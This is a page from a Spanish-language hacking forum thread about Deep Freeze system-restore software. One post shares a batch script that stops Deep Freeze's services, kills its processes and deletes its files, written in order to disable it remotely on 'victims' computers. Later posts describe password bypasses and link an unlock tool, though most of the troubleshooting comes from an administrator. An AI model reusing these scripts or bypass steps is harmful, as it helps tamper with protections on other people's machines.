elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


+  Foro de elhacker.net
|-+  Informática
| |-+  Tutoriales - Documentación (Moderadores: r32, ehn@)
| | |-+  DEEP FREEZE
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 6 7 8 9 [10] 11 12 13 Ir Abajo Respuesta Imprimir
Autor Tema: DEEP FREEZE  (Leído 444,434 veces)
-The Nax-

Desconectado Desconectado

Mensajes: 36


~▬-The Nax- is here▬~


Ver Perfil
Re: DEEP FREEZE
« Respuesta #90 en: 6 Octubre 2007, 01:49 am »

Hola a todos, bueno hace bastante que intento destruir deep freeze jaja.. y no puedo, por que alguans victimas que tenia, en su computadora tenian esta *****, y mi pregunta es si es probable deshabilitarlo con algun codigo de batch. Hice uno pero no se a ver si algunos que sepan que me lo diga si esta bien, mi problema es que lo tengo que deshabilitar remotamente que mucho mas dificil. ja..

Codigo:
@echo off
If exist "%ProgramFiles%\Faronics\Deep Freeze" (goto faronics) else (goto 1)
:1
goto fin
:faronics
net stop "DF5Serv"
net stop "DeepFrz"
Taskkill /f /IM DF5Serv.exe /IM FrzState2k.exe /IM DFServEx.exe /IM FrzState.exe
cd C.\
attrib -H -S -R WINBOOT.INI
del WINBOOT.INI 
cd C:\Archivos de programa\Faronics\Deep Freeze
attrib -H -S -R *.*
del /s /q *.*
exit

Espero su ayuda, Saludos,


En línea

zuma79

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Estoy frito...
« Respuesta #91 en: 17 Diciembre 2007, 23:56 pm »

Les comento lo que me pasa      :¬¬ tengo varias computadoras con el deep freeze instalado y al paracer trabajaban bien.

fue entonces cuando descargue absolutamente todas las actualizaciones de Microsoft (Porque lo puedo hacer), y porsupuesto desactive el DF. entonces ya que quise volver a congelar mi unidad PEEEELASSS....QUE YA NO JALA SOLO SE QUEDABA CONGELADA.....entonces lo desinsrale...y lo reinstale...pensando que esto me podria ayudar a corregir alguna configuracion o algo pero.....ahora no solo no puedo poner la contraseña y no que tampoco me deja desinstalarlo y no hayo que hacer......en este foro encontre la siguiente liga   http://www.ulises2k.com.ar/programas/index.php ...misma que probare...espero que algo pueda hacer y lo que salga les comentare....
mi sistema es XP SP2 completamente actualizado al dia de hoy.

Gracias por los consejos amigos


En línea

zuma79

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: DEEP FREEZE
« Respuesta #92 en: 19 Diciembre 2007, 03:35 am »

Pues...ahora si que estoy en broncas....de plano no se dejo.....corri el que se supone es un cd para bootear con el pero nada....dice que supuestamente lo quita pero al reiniciar simplemente sigue igual....... :huh:   caray......ahorasi que estoy en problemas......si no encuentro algo pronto tendre que darle foprmato y empezar desde cero a 6 MAQUINAS¡¡¡¡¡ SI ASI SOY DE TONTO.....BUENO seguyiremos buscando haber quetal..

suerte a los que tienen el mismo problema que yo (no el de mi coeficiente intelectual) sino el de el df..je..
bye
si encuentro algo se los comunicare
En línea

zuma79

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: DEEP FREEZE
« Respuesta #93 en: 21 Diciembre 2007, 01:11 am »

POR FIN....¡¡¡¡¡¡¡....ENCONTRE ALGO QUE ME FUNCIONO.......AQUI LES VA LA INDICACION:

1.-   Descargar el programa que te permite desactivar y por tanto desinstalar el DF.
2.-   Descargar el manual de uso.


Les cuanto mi experiencia:  Tenia el problema de que al actualizar mi pc con el Windowes update y querer reactivar la proteccion del DF simplemente me dejava colgado y no me permitia hacer absolutamente nada. Comente que en un caso me dejo desinstalarlo y con una nueva instalacion me hacia lo mismo. aunque ahora nisiquiera lo podia desactivar....eso me estaba frustrando. pero ahora les cuento

Entre en modo Seguro sin funciones de red a mi maquina y ejecute el programa, defini la ruta del ejecutable del DF y cambie su estado..ME LO PERMITIO¡¡¡¡QUE EMOCION.....despues simplemente reinicie mi maquina y Gualaaa.....ya estaba desactivado y por tanto apto para la desinstalacion.

cabe enfatizar que yo corria la version 4.20.020.0598 en mi maquina y ahora hare la prueba con una mas actual haber si cpon ello corrijo mi problema original que fue el de mantener al 100% de actualizaciones mis maquinas con el windows update.

dejo las ligas mis amigos:

http://usuarios.arnet.com.ar/fliamarconato/pages/DeepUnfreezer1.6.exe   programa

http://usuarios.arnet.com.ar/fliamarconato/pages/smanual.html  manual

Cualquier comentario estoy a sus ordenes

seguire informandoles
 ;D :rolleyes: :xD

En línea

zuma79

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: DEEP FREEZE
« Respuesta #94 en: 21 Diciembre 2007, 21:12 pm »

ME MUERO DEL CORAJE........
RECUERDAN QUE LES COMENTE QUE HABIA SOLUCIONADO MI PROBLEMA CON EL DEEP f ...PUES AL INSTALAR LA VERSION 6 ME HIZO EXACTAMENTE LO MSIMO PERO AHORA LA HERRAMIENTA QUE ME FUNCIONO EN UN PRINCIPIO SIMPLEMENTE NO JALA...ESTOY FURIOSO....Y SI NO ENCUENTRO ALGO PRONTO TENDRE QUE EMPEZAR DE CERO CON ESA MAQUINA...

BUENO...HAY LES COMENTARE LO QUE SUCEDA....
Ç
POR CIERTO....LO MAS CURIOSO ESQUE TENGO UNA MAQUINA CON LA VERSION ANTERIOR FUNCIONANDO PERFECTAMENTE CON EL DEEP FREER...ESTOY DESCONCERTADO.....NO SE QUE SEA

BUENO....NOS VEMOS
En línea

Artikbot
Holy Thunderforce
Ex-Staff
*
Desconectado Desconectado

Mensajes: 9.555


@ehn Division


Ver Perfil WWW
Re: DEEP FREEZE
« Respuesta #95 en: 22 Diciembre 2007, 23:17 pm »

Yo voy a probarlo con mi partición de windows a ver si va bien.

Es más que nada para que no se me llene de *****, algo totalmente habitual.


salu2!
En línea




Monto ordenadores a medida, me ajusto a todo tipo de presupuestos. Contáctame para más información.
Sólo para España peninsular y Baleares
jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: DEEP FREEZE
« Respuesta #96 en: 3 Enero 2008, 06:41 am »

Hay un programa que se llama "fuck deep freeze" que deja en blanco la clave juego presionan control, alt, shif y f6 y descongelan je je una vez que reinicia (descongelado) ya se pueden cancelar los procesos (frstate y el otro que no me acuerdo) luego...
En línea

jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: DEEP FREEZE
« Respuesta #97 en: 3 Enero 2008, 06:45 am »

... pueden eliminar la carpeta c:/archivos de programa/hyper technologies y reemplazarla por una que hayan copiado de otro pc pero que ustedes conozcan la clave y queda con su propia clave je je je espero que les sirva, lo mismo para la gente que tenga...
En línea

jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: DEEP FREEZE
« Respuesta #98 en: 3 Enero 2008, 06:47 am »

...ciber cafés y sufran este ataque pueden hacer el mismo proceso para recuperar el pc sin tener que formatear, basta con poner la carpeta con su propia clave y perdón por escribir 3 mensajes pero estoy desde mi cel y no puedo escribir mensajes largos ;)
En línea

zuma79

Desconectado Desconectado

Mensajes: 8


Ver Perfil
Re: DEEP FREEZE
« Respuesta #99 en: 14 Enero 2008, 22:31 pm »

Fijense que expuse mi problema a un colega comentandole mis problemas y le comente lo que creia que era.. (les recuerdo que suponia que era alguna actualizacion de windows o el antivirus)....y pues me dijo que el tuvo el mismo problema y, hoy dia lo asociamos al NOD32 que es el antivirus que tenemos instalado en nuestras maquinas. el me dijo que lo desinstalo e instalo el Karspesky y al instalar nuevamente el deep no tuvo mayor problema...esto, aclaro, lo hizo despues de formatear desde cero la maquina y dejarla cpon todas sus actualizaciones.

en concreto.  Pieso que alguna actualizacion del NOD32 es la que nos esta metiendo calambres a muchos como yo con el sistema en conjuncion con las actualizaciones de WinXPSP2.   hare la prueba personalmente y les comentarew como me fue.

Lo hare con la version 4.0...del Deep y con la 6.... del deep para comentarle los resultados y las diferencias

Saludos a todos los foreros
En línea

Páginas: 1 2 3 4 5 6 7 8 9 [10] 11 12 13 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Dll Injection Freeze
Programación C/C++
Badlands 1 3,763 Último mensaje 7 Mayo 2011, 19:48 pm
por Badlands
¿Alguna vulnerabilidad en deep freeze?
Hacking
miguelskk 6 6,448 Último mensaje 3 Mayo 2011, 00:11 am
por Edu
Deep web « 1 2 3 4 »
Dudas Generales
Penelope 38 155,591 Último mensaje 3 Mayo 2014, 13:53 pm
por MetalWarrior19
Deep web « 1 2 »
Dudas Generales
molina5258 14 13,850 Último mensaje 13 Mayo 2013, 02:41 am
por CloudswX
Desinstalacion del deep freeze
Seguridad
peppers 3 2,504 Último mensaje 9 Diciembre 2018, 15:52 pm
por PalitroqueZ
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines